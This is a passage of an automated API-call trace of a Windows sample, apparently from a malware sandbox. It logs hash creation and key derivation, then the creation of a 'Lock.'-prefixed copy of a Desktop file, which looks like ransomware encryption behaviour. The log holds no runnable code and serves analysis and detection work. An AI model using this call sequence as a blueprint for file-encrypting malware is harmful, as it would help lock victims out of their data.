CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.861] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.861] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.861] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.861] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.861] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.862] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.862] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.862] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.862] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.862] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0090.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.862] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0090.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.862] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.862] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.862] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.862] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.862] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.862] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.862] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.862] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.863] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.863] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.863] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.863] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.863] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.863] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.863] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.863] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.863] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.863] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.863] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.863] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.863] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.863] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.863] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.863] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.863] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.863] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.863] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.863] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.863] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.864] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9ce8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0090.864] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0090.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0090.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0090.864] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0090.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0090.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0090.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.864] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.864] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.864] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.864] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.864] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.864] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0090.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9f28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0090.865] CryptHashData (hHash=0x9a3f40, pbData=0x2a71a98, dwDataLen=0x3, dwFlags=0x1) returned 1 [0090.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.865] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.865] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.865] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.865] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.865] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0090.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9d60, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0090.865] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a3f40, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a3e80) returned 1 [0090.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.866] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.866] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0090.866] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.866] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0090.866] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0090.866] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0090.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0090.866] CryptDestroyHash (hHash=0x9a3f40) returned 1 [0090.866] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.867] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/ED 0nXQ VIkUvYr6" (normalized: "c:\\users\\fd1hvy\\desktop\\ed 0nxq vikuvyr6"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.867] GetLastError () returned 0x5 [0090.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0090.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0090.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0090.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0090.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0090.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0090.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75b28 [0090.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.868] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0090.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75b28 | out: hHeap=0x2af0000) returned 1 [0090.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0090.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2aae878 [0090.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0090.868] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.ED 0nXQ VIkUvYr6" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.ed 0nxq vikuvyr6"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0090.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0090.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0090.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0090.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0090.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0090.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 